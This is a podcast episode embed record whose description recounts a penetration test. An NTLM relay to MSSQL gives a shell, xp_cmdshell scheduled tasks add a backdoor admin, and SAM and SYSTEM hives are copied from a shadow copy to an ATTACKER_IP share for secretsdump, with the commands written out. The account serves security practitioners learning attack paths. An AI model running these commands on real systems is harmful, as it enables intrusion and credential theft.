{"version":1,"type":"rich","provider_name":"Libsyn","provider_url":"https:\/\/www.libsyn.com","height":90,"width":600,"title":"7MS #692: Tales of Pentest Pwnage \u2013 Part 76","description":"Happy Friday! Today\u2019s another hot pile of pentest pwnage. To make it easy on myself I\u2019m going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that:&amp;nbsp;https:\/\/www.guidepointsecurity.com\/blog\/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques\/. I relayed the DA account to a SQL box that BloodHound said had a \u201csession\u201d from another DA. One part I can\u2019t explain is the first relay got me a shell in the context of&amp;nbsp;NT SERVICE\\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as&amp;nbsp;NT AUTHORITY\\SYSTEM&amp;nbsp;(!). The&amp;nbsp;net&amp;nbsp;command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick:&amp;nbsp;xp_cmdshell schtasks \/create \/tn &quot;Maintenance&quot; \/tr &quot;net local group administrators backdoor \/add&quot; \/sc once \/st 12:00 \/ru SYSTEM \/f&amp;nbsp;and then&amp;nbsp;xp_cmdshell schtasks \/run \/tn &quot;Maintenance&quot;. Turns out a DA wasn\u2019t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn\u2019t copy reg hives out of it \u2013 EDR was unhappy. In the end, the bizarre combo of things that did the trick was:  Setup smbserver.py with username\/password auth on my attacking box:&amp;nbsp;smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy:&amp;nbsp;mklink \/d C:\\tempbackup \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy123\\ From command prompt on the victim system, I authenticated to my rogue share:&amp;nbsp;net use \\\\ATTACKER_IP\\share \/user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive:&amp;nbsp;copy SYSTEM \\\\my.attackingip\\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However\u2026.the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move:&amp;nbsp;secretsdump -sam sam.test -system sys.test LOCAL  ","author_name":"7 Minute Security","author_url":"https:\/\/7MinSec.com","html":"<iframe title=\"Libsyn Player\" style=\"border: none\" src=\"\/\/html5-player.libsyn.com\/embed\/episode\/id\/38192630\/height\/90\/theme\/custom\/thumbnail\/yes\/direction\/forward\/render-playlist\/no\/custom-color\/88AA3C\/\" height=\"90\" width=\"600\" scrolling=\"no\"  allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen><\/iframe>","thumbnail_url":"https:\/\/assets.libsyn.com\/secure\/item\/38192630"}